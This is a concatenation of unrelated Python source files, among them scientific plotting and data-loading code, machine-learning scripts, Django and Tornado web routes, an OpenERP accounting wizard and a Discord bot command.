print 'LonT[lona], LatT[lata], AltT[alta], EdsT[lona,lata,alta,0], EdsEr[lona,lata,alta,0], EdsEo[lona,lata,alta,0]', LonT[lona], LatT[lata], AltT[alta], EdsT[lona,lata,alta,0], EdsEr[lona,lata,alta,0], EdsEo[lona,lata,alta,0]
ind = obs_vrmse_r>0
if sim: #simulated data, want to compare est with truth
#f107 vs time plot
plot_tec_lib.time_plot(timeT,[148.0]*len(timeT),'$F_{10.7}$ measured', timeE,f107Er,f107Eo,f107sdEr,f107sdEo,'$F_{10.7}$ estimated','$F_{10.7}$ estimated $\pm$ SD', (0,24),(100,300),'$F_{10.7}$ [SFU]', 'f107_00')
#Eds[13,13,34,:] vs time plot
plot_tec_lib.time_plot(timeT, EdsT[lona,lata,alta,:], '$D_{e,aa}$ measured', timeE, EdsEr[lona,lata,alta,:], EdsEo[lona,lata,alta,:], EdssdEr[lona,lata,alta,:], EdssdEo[lona,lata,alta,:], '$D_{e,aa}$ estimated', '$D_{e,aa}$ estimated $\pm$ SD', (0,24), (None,None), '$D_{e,AA}$ [$e$ $m^{-3}$]', 'daa00')
#obs_diag rmse vs time plot
plot_tec_lib.time_plot(obs_time[ind], obs_vtruth_r[ind],'ignore', obs_time[ind], obs_vrmse_r[ind], obs_vrmse_o[ind], obs_vspread_r[ind], obs_vspread_o[ind], 'Average VTEC error', 'Average VTEC spread ($\pm$ SD)', (0,24),(0,10),'Average VTEC error [TECU]', 'obs_rmse00')
else:
#f107 vs time plot
plot_tec_lib.time_plot(timeT,[148.0]*len(timeT),'ignore', timeE,f107Er,f107Eo,f107sdEr,f107sdEo,'$F_{10.7}$ estimated','$F_{10.7}$ estimated $\pm$ SD', (0,24),(100,300),'$F_{10.7}$ [SFU]', 'f107_00')
#Eds[13,13,34,:] vs time plot
plot_tec_lib.time_plot(timeT, EdsT[lona,lata,alta,:], 'ignore', timeE, EdsEr[lona,lata,alta,:], EdsEo[lona,lata,alta,:], EdssdEr[lona,lata,alta,:], EdssdEo[lona,lata,alta,:], '$D_{e,aa}$ estimated', '$D_{e,aa}$ estimated $\pm$ SD', (0,24), (None,None), '$D_{e,AA}$ [$e$ $m^{-3}$]', 'daa00')
#obs_diag rmse vs time plot
plot_tec_lib.time_plot(obs_time[ind], obs_vtruth_r[ind],'ignore', obs_time[ind], obs_vrmse_r[ind], obs_vrmse_o[ind], obs_vspread_r[ind], obs_vspread_o[ind], 'Average VTEC error', 'Average VTEC spread ($\pm$ SD)', (0,24),(0,16),'Average VTEC error [TECU]', 'obs_rmse00')
#Eds[13,13,:,:] vs time, alt subplots
#plot_tec_lib.time_plot_alt(timeT, EdsT[lona,lata,:,:], AltT, '$D_{e,aa}$ measured', timeE, EdsEr[lona,lata,:,:], EdsEo[lona,lata,:,:], EdssdEr[lona,lata,:,:], EdssdEo[lona,lata,:,:], '$D_{e,aa}$ estimated', '$D_{e,aa}$ estimated $\pm$ SD', (0,24), (1e8,1e12), '$D_{e,AA}$ [$e$ $m^{-3}$]', 'daa_alt00')
#error vs time plot
#plot_tec_lib.time_plot(timeT,[1e32.0]*len(timeT),'ignore', np.array(list(tcommon)),VtecED[:,:,ti],f107Eo,f107sdEr,f107sdEo,'$F_{10.7}$ estimated','$F_{10.7}$ estimated $\pm$ SD', (0,24),(100,300),'$F_{10.7}$ [SFU]', 'f107_00')
#obs_diag mean vs time plot
ind = obs_vrmse_r>0
plot_tec_lib.time_plot(obs_time[ind], obs_vtruth_r[ind],'VT', obs_time[ind], obs_vensm_r[ind], obs_vensm_o[ind], obs_vspread_r[ind], obs_vspread_o[ind], 'ensm', 'spread', (None,None),(None,None),'Vensm', 'obs_ens00')
#write interpolated Truth data into a dart obs file
#execfile('write_gps_txt.py')
# DART $Id$
# from Alexey Morozov
# <next few lines under version control, do not edit>
# $URL$
# $Revision$
# $Date$
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RAssertiveNumbers(RPackage):
"""assertive.numbers: Assertions to Check Properties of Numbers
A set of predicates and assertions for checking the
properties of numbers. This is mainly for use by other
package developers who want to include run-time testing
features in their own packages. End-users will usually want
to use assertive directly."""
homepage = "https://bitbucket.org/richierocks/assertive.numbers"
url = "https://cloud.r-project.org/src/contrib/assertive.numbers_0.0-2.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/assertive.numbers"
version('0.0-2', sha256='bae18c0b9e5b960a20636e127eb738ecd8a266e5fc29d8bc5ca712498cd68349')
depends_on('r@3.0.0:', type=('build', 'run'))
depends_on('r-assertive-base@0.0-2:', type=('build', 'run'))
|
import torch
from torch import nn
from torch.optim import SGD
from flamecalc.utils import *
from tqdm import tqdm
class CalVarSolver(nn.Module):
def __init__(self, functional, start_point, end_point, domain=None):
super().__init__()
self.functional = functional
self.p_1 = start_point
self.p_2 = end_point
if domain is None:
self.domain = torch.linspace(self.p_1[0], self.p_2[0], 100)
else:
if domain[0] != start_point[0] or domain[-1] != end_point[0]:
raise ValueError(
"Given domain and boundary points do not match"
)
self.domain = domain
def forward(self, theta: torch.Tensor):
m = theta.shape[1]
y_0 = y0(self.p_1, self.p_2, self.domain)
x_s = sin_matrix(m, self.domain)
x_c = cos_matrix(m, self.domain)
residual = torch.matmul(theta, x_s)
residual_d = torch.matmul(theta, x_c)
y = y_0 + residual
a = (self.p_1[1] - self.p_2[1])/(self.p_1[0] - self.p_2[0])
dy = a + residual_d
fy = self.functional(y, dy, self.domain.unsqueeze(0))
result = torch.trapz(fy, self.domain.unsqueeze(0))
return {'result': result, 'y': y, 'dy': dy}
def optimize(self, theta=None, optimizer=None, lr=0.002, epoch=2000, m=5):
if theta is None:
theta = torch.rand((1, m), requires_grad=True)
losses = []
add_loss = losses.append
if optimizer is None:
optimizer = SGD([theta], lr=lr)
p_bar = tqdm(range(epoch), ncols=150)
for i in p_bar:
result = self.forward(theta)
loss = result["result"]
optimizer.zero_grad()
loss.backward()
optimizer.step()
add_loss(loss.detach().numpy()[0])
p_bar.set_description(f"Epoch {i + 1}/{epoch} | "
f"value: {loss.detach().numpy()[0]:.5f}")
result = self.forward(theta)
y, dy = result["y"], result["dy"]
return {"theta": theta, "y": y, "dy": dy, "log": losses}
|
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 15 15:45:45 2020
@author: Boxi
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as seabornInstance
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn import metrics
data = pd.read_csv("season_stats_merged.csv")
data.shape
data.describe()
data.isnull().any()
# drop all NA values
cleaned = data.dropna()
cleaned.isnull().any()
X = cleaned[['Year', 'Age', 'height', 'weight']]
y = cleaned['TS%'].values
plt.figure(figsize=(15,10))
plt.tight_layout()
seabornInstance.distplot(cleaned['TS%'])
# most TS% around 0.5
# split data into training and test
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2,
random_state=0)
# train model
regressor = LinearRegression()
regressor.fit(X_train, y_train)
coeff_df = pd.DataFrame(regressor.coef_, X.columns, columns=['Coefficient'])
coeff_df
# predictions on test data
y_pred = regressor.predict(X_test)
# difference between actual & predicted value
df = pd.DataFrame({'Actual': y_test, 'Predicted': y_pred})
df1 = df.head(25)
df1
# plot comparison of Actual vs Predicted values
df1.plot(kind='bar', figsize=(10,8))
plt.grid(which='major', linestyle='-', linewidth='0.5', color='green')
plt.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
plt.show()
# evaluate performance by looking at MAE, MSE, RMSE
print('Mean Absolute Error:', metrics.mean_absolute_error(y_test, y_pred))
print('Mean Squared Error:', metrics.mean_squared_error(y_test, y_pred))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(y_test, y_pred)))
y.mean()
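# Rule-of-thumb check (informal): compare the RMSE printed above with the mean
# TS% computed here; an RMSE well below ~10% of that mean would suggest this
# simple linear model fits reasonably, otherwise more predictive features are
# probably needed.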
|
# -*- coding: utf-8 -*-
import sys, codecs
from tqdm import tqdm
SRC_FILE = sys.argv[1]
CONTENT_PLAN = sys.argv[2]
EVAL_OUTPUT = sys.argv[3] # tuples
CONTENT_PLAN_INTER = sys.argv[4]
TRAIN = True
DELIM = u"│"
inputs = []
content_plans = []
with codecs.open(CONTENT_PLAN, "r", "utf-8") as corpus_file:
for _, line in enumerate(corpus_file):
content_plans.append(line.split())
with codecs.open(SRC_FILE, "r", "utf-8") as corpus_file:
for _, line in enumerate(corpus_file):
inputs.append(line.split())
outputs = []
eval_outputs = []
for i, input in tqdm(enumerate(inputs)):
content_plan = content_plans[i]
output = []
eval_output = []
records = set()
for record in content_plan:
output.append(input[int(record)])
elements = input[int(record)].split(DELIM)
if elements[0].isdigit():
record_type = elements[2]
if not elements[2].startswith('TEAM'):
record_type = 'PLAYER-' + record_type
# only record digits ??
eval_output.append("|".join([elements[1].replace("_", " ").strip('<').strip('>'), elements[0], record_type]))
outputs.append(" ".join(output))
eval_outputs.append("\n".join(eval_output))
# output_file = codecs.open(EVAL_OUTPUT, 'w', "utf-8")
# output_file.write("\n")
# output_file.write("\n\n".join(eval_outputs))
# output_file.write("\n")
# output_file.close()
output_file = codecs.open(CONTENT_PLAN_INTER, 'w', "utf-8")
output_file.write("\n".join(outputs))
output_file.write("\n")
output_file.close()
|
from django.conf import settings
from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.views.generic import TemplateView
from views import get_api_home, jquery_test_view, home
from videos.views import category_list, category_detail, video_detail
from billing.views import braintree_upgrade, billing_history, braintree_cancel_subscription, payu_upgrade, payu_notify, account_upgrade
from accounts.views import account_dashboard
from comments.views import comment_thread, comment_create_view
from notifications.views import all, get_notifications_ajax, read
from srvup.views import send_feedback
from rest_framework import routers
from rest_framework_jwt.views import obtain_jwt_token
from videos.serializers import VideoViewSet, CategoryViewSet
from comments.serializers import CommentViewSet
from videos.views import CategoryListAPIView, CategoryDetailAPIView, VideoDetailAPIView
from comments.views import CommentAPICreateView, CommentDetailAPIView, CommentListAPIView
router = routers.DefaultRouter()
router.register(r'categories', CategoryViewSet)
router.register(r'comments', CommentViewSet)
router.register(r'videos', VideoViewSet)
urlpatterns = [
# default API router
url(r'^api/', include(router.urls)),
url(r'^api/auth/', include('rest_framework.urls', namespace='rest_framework')),
    # in order to get an auth token we need to make a curl request (it uses django-rest-framework-jwt)
# curl -X POST -d "username=admin&password=abc123" http://localhost:8000/api-token-auth/
# to get the access with a token: curl -H "Authorization: JWT <your_token>" http://localhost:8000/protected-url/
url(r'^api/auth/token/$', obtain_jwt_token),
# Lists all categories we have
url(r'^api2/categories/$', CategoryListAPIView.as_view(), name='category_list_api'),
url(r'^api2/categories/(?P<slug>[\w-]+)/$', CategoryDetailAPIView.as_view(), name='category_detail_api'),
url(r'^api2/categories/(?P<cat_slug>[\w-]+)/(?P<vid_slug>[\w-]+)/$', VideoDetailAPIView.as_view(), name='video_detail_api'),
url(r'^api2/comment/$', CommentListAPIView.as_view(), name='comment_list_api'),
url(r'^api2/comment/create/$', CommentAPICreateView.as_view(), name='comment_create_api'),
url(r'^api2/comment/(?P<id>\d+)/$', CommentDetailAPIView.as_view(), name='comment_detail_api'),
# new APIs for jquery test
url(r'^api2/$', get_api_home, name='api_home'),
url(r'^jquery-test/$', jquery_test_view, name='jquery_test_view'),
# Project main navigation map
url(r'^$', home, name='home'),
url(r'^contact_us/$', TemplateView.as_view(template_name='company/contact_us.html'), name='contact_us'),
url(r'^categories/$', category_list, name='categories'),
url(r'^categories/(?P<cat_slug>[\w-]+)/$', category_detail, name='cat_detail'),
url(r'^categories/(?P<cat_slug>[\w-]+)/(?P<vid_slug>[\w-]+)/$', video_detail, name='video_detail'),
url(r'^admin/', admin.site.urls),
url(r'^send_feedback/$', send_feedback, name='send_feedback'),
]
# enrollment
urlpatterns += [
url(r'^billing/upgrade/$', account_upgrade, name='account_upgrade'),
url(r'^billing/history/$', billing_history, name='billing_history'),
url(r'^billing/braintree_upgrade/$', braintree_upgrade, name='braintree_upgrade'),
url(r'^billing/braintree_cancel$', braintree_cancel_subscription, name='braintree_cancel_subscription'),
url(r'^billing/payu_upgrade/$', payu_upgrade, name='payu_upgrade'),
url(r'^billing/payu_notify/$', payu_notify, name='payu_notify'),
]
# auth login/logout/register
urlpatterns += [
    url(r'^accounts/dashboard/$', account_dashboard, name='account_dashboard'),
url(r'^accounts/', include('allauth.urls')),
]
# Comment Thread
urlpatterns += [
url(r'^comments/(?P<id>\d+)/$', comment_thread, name='comment_thread'),
url(r'^comments/create/$', comment_create_view, name='comment_create'),
]
# Notifications Thread
urlpatterns += [
url(r'^notifications/$', all, name='notifications_all'),
url(r'^notifications/ajax/$', get_notifications_ajax, name='get_notifications_ajax'),
url(r'^notifications/read/(?P<id>\d+)/$', read, name='notifications_read'),
]
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
import sys
import os
import yaml
from tables_io import io
from rail.estimation.estimator import Estimator
# Note: This is where 'base.yaml' actually belongs, but how to make it so is still an open question
def main(argv):
if len(argv) == 2:
# this is in case hiding the base yaml is wanted
input_yaml = argv[1]
base_config = 'base.yaml'
elif len(argv) == 3:
input_yaml = argv[1]
base_config = argv[2]
else:
print(len(argv))
print("Usage: main <config yaml file> [base config yaml]")
sys.exit()
with open(input_yaml, 'r') as f:
run_dict = yaml.safe_load(f)
name = run_dict['run_params']['class_name']
try:
Estimator._find_subclass(name)
except KeyError:
raise ValueError(f"Class name {name} for PZ code is not defined")
code = Estimator._find_subclass(name)
print(f"code name: {name}")
pz = code(base_config, run_dict)
pz.inform_dict = run_dict['run_params']['inform_options']
if pz.inform_dict['load_model']:
        # note: specific options are set in the subclass func def
pz.load_pretrained_model()
else:
trainfile = pz.trainfile
train_fmt = trainfile.split(".")[-1]
training_data = io.read(trainfile,
None,
train_fmt,
)[pz.groupname]
pz.inform(training_data)
if 'run_name' in run_dict['run_params']:
outfile = run_dict['run_params']['run_name'] + '.hdf5'
tmpfile = "temp_" + outfile
else:
outfile = 'output.hdf5'
if pz.output_format == 'qp':
tmploc = os.path.join(pz.outpath, name, tmpfile)
outfile = run_dict['run_params']['run_name'] + "_qp.hdf5"
saveloc = os.path.join(pz.outpath, name, outfile)
for chunk, (start, end, data) in enumerate(io.iterHdf5ToDict(pz.testfile,
pz._chunk_size,
'photometry')):
pz_data_chunk = pz.estimate(data)
if chunk == 0:
if pz.output_format == 'qp':
group, outf = pz_data_chunk.initializeHdf5Write(saveloc, pz.num_rows)
else:
_, outf = io.initializeHdf5Write(saveloc, None, zmode=((pz.num_rows,), 'f4'),
pz_pdf=((pz.num_rows, pz.nzbins), 'f4'))
if pz.output_format == 'qp':
pz_data_chunk.writeHdf5Chunk(group, start, end)
else:
io.writeDictToHdf5Chunk(outf, pz_data_chunk, start, end)
print("writing " + name + f"[{start}:{end}]")
num_chunks = end // pz._chunk_size
if end % pz._chunk_size > 0:
num_chunks += 1
if pz.output_format == 'qp':
pz_data_chunk.finalizeHdf5Write(outf)
else:
io.finalizeHdf5Write(outf, zgrid=pz.zgrid)
print("finished")
if __name__ == "__main__":
main(sys.argv)
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
class validate_account_move(osv.osv_memory):
_name = "validate.account.move"
_description = "Validate Account Move"
_columns = {
'journal_ids': fields.many2many('account.journal', 'wizard_validate_account_move_journal', 'wizard_id', 'journal_id', 'Journal', required=True),
'period_ids': fields.many2many('account.period', 'wizard_validate_account_move_period', 'wizard_id', 'period_id', 'Period', required=True, domain=[('state','<>','done')]),
}
def validate_move(self, cr, uid, ids, context=None):
obj_move = self.pool.get('account.move')
if context is None:
context = {}
data = self.read(cr, uid, ids[0], context=context)
ids_move = obj_move.search(cr, uid, [('state','=','draft'),('journal_id','in',tuple(data['journal_ids'])),('period_id','in',tuple(data['period_ids']))], order='date')
if not ids_move:
raise osv.except_osv(_('Warning!'), _('Specified journals do not have any account move entries in draft state for the specified periods.'))
obj_move.button_validate(cr, uid, ids_move, context=context)
return {'type': 'ir.actions.act_window_close'}
class validate_account_move_lines(osv.osv_memory):
_name = "validate.account.move.lines"
_description = "Validate Account Move Lines"
def validate_move_lines(self, cr, uid, ids, context=None):
obj_move_line = self.pool.get('account.move.line')
obj_move = self.pool.get('account.move')
move_ids = []
if context is None:
context = {}
data_line = obj_move_line.browse(cr, uid, context['active_ids'], context)
for line in data_line:
if line.move_id.state=='draft':
move_ids.append(line.move_id.id)
move_ids = list(set(move_ids))
if not move_ids:
            raise osv.except_osv(_('Warning!'), _('Selected entry lines do not have any account move entries in draft state.'))
obj_move.button_validate(cr, uid, move_ids, context)
return {'type': 'ir.actions.act_window_close'}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
from typing import Dict, Any
from final_filter.abc_filtering_module import FilteringModule
class PerplexityModule(FilteringModule):
def __init__(self, threshold: float):
self.threshold = threshold
def validate(self, cluster: Dict[str, Any]) -> bool:
return cluster["perplexity"] <= self.threshold
def get_name(self):
return f"PerplexityModule - threshold = {self.threshold}"
|
import os
from cStringIO import StringIO
import tarfile
import numpy as np
from . import get_data_home
from tools import download_with_progress_bar
TARGETLIST_URL = ("http://www.astro.washington.edu/users/ivezic/"
"linear/allDataFinal/allLINEARfinal_targets.dat")
DATA_URL = ("http://www.astro.washington.edu/users/ivezic/"
"linear/allDataFinal/allLINEARfinal_dat.tar.gz")
# old version of the data
#GENEVA_URL = ("http://www.astro.washington.edu/users/ivezic/"
# "DMbook/data/LINEARattributes.dat"
#GENEVA_ARCHIVE = 'LINEARattributes.npy'
#ARCHIVE_DTYPE = [(s, 'f8') for s in ('RA', 'Dec', 'ug', 'gi', 'iK',
# 'JK', 'logP', 'amp', 'skew')]
GENEVA_URL = ("http://www.astro.washington.edu/users/ivezic/"
"DMbook/data/LINEARattributesFinalApr2013.dat")
GENEVA_ARCHIVE = 'LINEARattributesFinalApr2013.npy'
ARCHIVE_DTYPE = ([(s, 'f8') for s in ('RA', 'Dec', 'ug', 'gi', 'iK',
'JK', 'logP', 'amp', 'skew',
'kurt', 'magMed', 'nObs')]
+ [('LCtype', 'i4'), ('LINEARobjectID', '|S20')])
target_names = ['objectID', 'raLIN', 'decLIN', 'raSDSS', 'decSDSS', 'r',
'ug', 'gr', 'ri', 'iz', 'JK', '<mL>', 'std', 'rms',
'Lchi2', 'LP1', 'phi1', 'S', 'prior']
class LINEARdata:
"""A container class for the linear dataset.
Because the dataset is often not needed all at once, this class
offers tools to access just the needed components
Example
-------
>>> data = fetch_LINEAR_sample()
>>> lightcurve = data[data.ids[0]]
"""
@staticmethod
def _name_to_id(name):
return int(name.split('.')[0])
@staticmethod
def _id_to_name(id):
return str(id) + '.dat'
def __init__(self, data_file, targetlist_file):
self.targets = np.recfromtxt(targetlist_file)
self.targets.dtype.names = target_names
self.dataF = tarfile.open(data_file)
self.ids = np.array(map(self._name_to_id, self.dataF.getnames()))
# rearrange targets so lists are in the same order
self.targets = self.targets[self.targets['objectID'].argsort()]
ind = self.targets['objectID'].searchsorted(self.ids)
self.targets = self.targets[ind]
def get_light_curve(self, id):
"""Get a light curve with the given id.
Parameters
----------
id: integer
LINEAR id of the desired object
Returns
-------
lightcurve: ndarray
a size (n_observations, 3) light-curve.
columns are [MJD, flux, flux_err]
"""
return self[id]
def get_target_parameter(self, id, param):
"""Get a target parameter associated with the given id.
Parameters
----------
id: integer
LINEAR id of the desired object
param: string
parameter name of the desired object (see below)
Returns
-------
val: scalar
value of the requested target parameter
Notes
-----
Target parameters are one of the following:
['objectID', 'raLIN', 'decLIN', 'raSDSS', 'decSDSS', 'r',
'ug', 'gr', 'ri', 'iz', 'JK', '<mL>', 'std', 'rms',
'Lchi2', 'LP1', 'phi1', 'S', 'prior']
"""
i = np.where(self.targets['objectID'] == id)[0]
try:
val = self.targets[param][i[0]]
except:
raise KeyError(id)
return val
def __getitem__(self, id):
try:
lc = np.loadtxt(self.dataF.extractfile(self._id_to_name(id)))
except:
raise KeyError(id)
return lc
def fetch_LINEAR_sample(data_home=None, download_if_missing=True):
"""Loader for LINEAR data sample
Parameters
----------
data_home : optional, default=None
        Specify another download and cache folder for the datasets. By default
        all astroML data is stored in '~/astroML_data' subfolders.
download_if_missing : optional, default=True
        If False, raise an IOError if the data is not locally available
instead of trying to download the data from the source site.
Returns
-------
data : LINEARdata object
A custom object which provides access to 7010 selected LINEAR light
curves.
"""
data_home = get_data_home(data_home)
if not os.path.exists(data_home):
os.makedirs(data_home)
targetlist_file = os.path.join(data_home, os.path.basename(TARGETLIST_URL))
data_file = os.path.join(data_home, os.path.basename(DATA_URL))
if not os.path.exists(targetlist_file):
if not download_if_missing:
raise IOError('data not present on disk. '
'set download_if_missing=True to download')
targets = download_with_progress_bar(TARGETLIST_URL)
open(targetlist_file, 'wb').write(targets)
if not os.path.exists(data_file):
if not download_if_missing:
raise IOError('data not present on disk. '
'set download_if_missing=True to download')
databuffer = download_with_progress_bar(DATA_URL)
open(data_file, 'wb').write(databuffer)
return LINEARdata(data_file, targetlist_file)
def fetch_LINEAR_geneva(data_home=None, download_if_missing=True):
"""Loader for LINEAR geneva data.
This supplements the LINEAR data above with well-determined periods
and other light curve characteristics.
Parameters
----------
data_home : optional, default=None
        Specify another download and cache folder for the datasets. By default
        all astroML data is stored in '~/astroML_data' subfolders.
download_if_missing : optional, default=True
        If False, raise an IOError if the data is not locally available
instead of trying to download the data from the source site.
Returns
-------
data : record array
data on 7000+ LINEAR stars from the Geneva catalog
"""
data_home = get_data_home(data_home)
if not os.path.exists(data_home):
os.makedirs(data_home)
archive_file = os.path.join(data_home, GENEVA_ARCHIVE)
if not os.path.exists(archive_file):
if not download_if_missing:
raise IOError('data not present on disk. '
'set download_if_missing=True to download')
databuffer = download_with_progress_bar(GENEVA_URL)
data = np.loadtxt(StringIO(databuffer), dtype=ARCHIVE_DTYPE)
np.save(archive_file, data)
else:
data = np.load(archive_file)
return data
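# Hypothetical usage sketch: the first call downloads the archives (network
# access required) and caches them under the astroML data home.
if __name__ == "__main__":
    data = fetch_LINEAR_sample()
    lc = data[data.ids[0]]           # (n_observations, 3) array: MJD, flux, flux_err
    geneva = fetch_LINEAR_geneva()   # record array of per-object light-curve attributes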
|
from snovault import (
CONNECTION,
upgrade_step
)
@upgrade_step('chip_peak_enrichment_quality_metric', '1', '2')
def chip_peak_enrichment_quality_metric_1_2(value, system):
if 'FRiP' in value:
value['frip'] = value['FRiP']
value.pop('FRiP')
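# Illustrative before/after of the in-place rename performed by the upgrade
# step above (values are hypothetical):
#   value == {'FRiP': 0.42, 'status': 'released'}
#   chip_peak_enrichment_quality_metric_1_2(value, system)
#   value == {'frip': 0.42, 'status': 'released'}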
|
import logging
import arrow
from dateutil.relativedelta import relativedelta
from discord import Embed
from discord.commands import ApplicationContext, slash_command
from discord.ext import commands
from bot import start_time
from bot.bot import Bot
from bot.core import settings
from bot.utils.formatters import color_level
log = logging.getLogger(__name__)
class Ping(commands.Cog):
"""Get info about the bot's ping and uptime."""
def __init__(self, bot: Bot):
self.bot = bot
@slash_command(guild_ids=settings.guild_ids)
async def ping(self, ctx: ApplicationContext) -> None:
"""🏓 Ping the bot to see its latency and uptime."""
difference = relativedelta(arrow.utcnow() - start_time)
uptime: str = start_time.shift(
seconds=-difference.seconds,
minutes=-difference.minutes,
hours=-difference.hours,
days=-difference.days
).humanize()
latency = round(self.bot.latency * 1000)
embed = Embed(
colour=color_level(latency),
description=f"• Gateway Latency: **{latency}ms**\n• Start time: **{uptime}**"
)
await ctx.respond(embed=embed)
def setup(bot: Bot) -> None:
"""Loads the Ping cog."""
bot.add_cog(Ping(bot))
|
from app.clients.email.govdelivery_client import govdelivery_status_map
govdelivery_webhook_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "x-www-form-urlencoded POST from Granicus with delivery status define at https://developer.govdelivery.com/api/tms/resource/webhooks/", # noqa: E501
"type": "object",
"title": "POST data for /notifications/govdelivery",
"properties": {
"sid": {"type": "string"},
"message_url": {"type": "string", "format": "uri"},
"recipient_url": {"type": "string", "format": "uri"},
"status": {"enum": govdelivery_status_map.keys()},
"message_type": {"enum": ["sms", "email"]},
"completed_at": {"type": "string"},
"error_message": {"type": "string"}
},
"required": ["message_url", "status", "sid", "message_type"]
}
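# Hypothetical validation sketch: assumes the third-party `jsonschema` package
# is available and that "sent" is one of the keys of govdelivery_status_map.
if __name__ == "__main__":
    from jsonschema import validate

    payload = {
        "sid": "abc123",
        "message_url": "https://tms.govdelivery.com/messages/email/1",
        "status": "sent",
        "message_type": "email",
    }
    # raises jsonschema.ValidationError if the payload violates the schema
    validate(instance=payload, schema=govdelivery_webhook_schema)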
|
# Initialize our dictionary.
tokitsukaze = {}
# Process our input.
tokitsukazeHP = int(input())
# Determine the best achievable rank by brute-forcing the amount (0, 1, or 2) added to the HP.
for i in range(0, 3):
tokitsukazeCategory = (int(tokitsukazeHP + i)) % 4
if tokitsukazeCategory == 0:
tokitsukaze[i] = 'D'
elif tokitsukazeCategory == 1:
tokitsukaze[i] = 'A'
elif tokitsukazeCategory == 2:
tokitsukaze[i] = 'C'
else:
tokitsukaze[i] = 'B'
# Sort the dictionary by its value.
sorted_tokitsukaze = sorted(tokitsukaze.items(), key=lambda x: x[1])
# Unpack our tuple to get the answer.
tokitsukaze_added, tokitsukaze_rank = sorted_tokitsukaze[0]
# Print our answer.
print(tokitsukaze_added, tokitsukaze_rank)
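# Worked example: for input 6 the loop yields (6+0)%4=2 -> 'C', (6+1)%4=3 -> 'B',
# (6+2)%4=0 -> 'D'; sorting by rank letter picks 'B' first, so the output is "1 B".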
|
from collections import OrderedDict
from tornado.web import RequestHandler
from tornado.locale import get_supported_locales
from .dispatch import route, LanguageCookieMixin
from . import pageutils
import libcard2.localization
@route("/")
class Slash(LanguageCookieMixin):
def get(self):
self.render("home.html")
@route("/(?:idols|idol)/?")
@route("/idols/(unit)/([0-9]+)")
@route("/idols/(group)/([0-9]+)")
class IdolsRoot(LanguageCookieMixin):
def get(self, specific=None, specific_value=None):
nav_crumb_level = 0
if specific == "unit":
members = self.settings["master"].lookup_member_list(subunit=int(specific_value))
nav_crumb_level = 2
elif specific == "group":
members = self.settings["master"].lookup_member_list(group=int(specific_value))
nav_crumb_level = 1
else:
members = self.settings["master"].lookup_member_list()
tlbatch = set()
groups = OrderedDict()
for mem in members:
if mem.group_name in groups:
groups[mem.group_name].append(mem)
else:
groups[mem.group_name] = [mem]
tlbatch.update(mem.get_tl_set())
self._tlinject_base = self.settings["string_access"].lookup_strings(
tlbatch, self.get_user_dict_preference()
)
self.render("member_list.html", member_groups=groups, nav_crumb_level=nav_crumb_level)
@route("/lives")
class LiveRoot(LanguageCookieMixin):
def get(self):
songs = self.settings["master"].lookup_song_list()
tlbatch = set()
groups = OrderedDict()
for s in songs:
if s.member_group_name in groups:
groups[s.member_group_name].append(s)
else:
groups[s.member_group_name] = [s]
tlbatch.update(s.get_tl_set())
self._tlinject_base = self.settings["string_access"].lookup_strings(
tlbatch, self.get_user_dict_preference()
)
self.render("song_list.html", live_groups=groups, nav_crumb_level=0)
@route("/live(?:s)?/([0-9]+)(/.*)?")
class LiveSingle(LanguageCookieMixin):
def get(self, live_id, _slug=None):
song = self.settings["master"].lookup_song_difficulties(int(live_id))
tlbatch = song.get_tl_set()
self._tlinject_base = self.settings["string_access"].lookup_strings(
tlbatch, self.get_user_dict_preference()
)
self.render("song.html", songs=[song])
@route("/accessory_skills")
class Accessories(LanguageCookieMixin):
def get(self):
skills = self.settings["master"].lookup_all_accessory_skills()
tlbatch = set()
for skill in skills:
tlbatch.update(skill.get_tl_set())
self._tlinject_base = self.settings["string_access"].lookup_strings(
tlbatch, self.get_user_dict_preference()
)
self.render("accessories.html", skills=skills)
@route("/hirameku_skills")
class Hirameku(LanguageCookieMixin):
def get(self):
skills = self.settings["master"].lookup_all_hirameku_skills()
skills.sort(key=lambda x: (x.levels[0][2], x.rarity))
tlbatch = set()
for skill in skills:
tlbatch.update(skill.get_tl_set())
self._tlinject_base = self.settings["string_access"].lookup_strings(
tlbatch, self.get_user_dict_preference()
)
self.render("accessories.html", skills=skills)
@route("/experiments")
class ExperimentPage(LanguageCookieMixin):
def get(self):
self.render("experiments.html")
@route(r"/([a-z]+)/story/(.+)")
class StoryViewerScaffold(LanguageCookieMixin):
def get(self, region, script):
self.render(
"story_scaffold.html",
region=region,
basename=script,
asset_path=pageutils.sign_object(self, f"adv/{script}", "json"),
)
@route(r"/api/v1/(?:[^/]*)/skill_tree/([0-9]+).json")
class APISkillTree(RequestHandler):
def get(self, i):
items, shape, locks = self.settings["master"].lookup_tt(int(i))
items["items"] = {
k: (pageutils.image_url_reify(self, v[0], "png"), v[1])
for k, v in items["items"].items()
}
self.write({"id": int(i), "tree": shape, "lock_levels": locks, "item_sets": items})
@route(r"/api/private/search/bootstrap.json")
class APISearchBootstrap(RequestHandler):
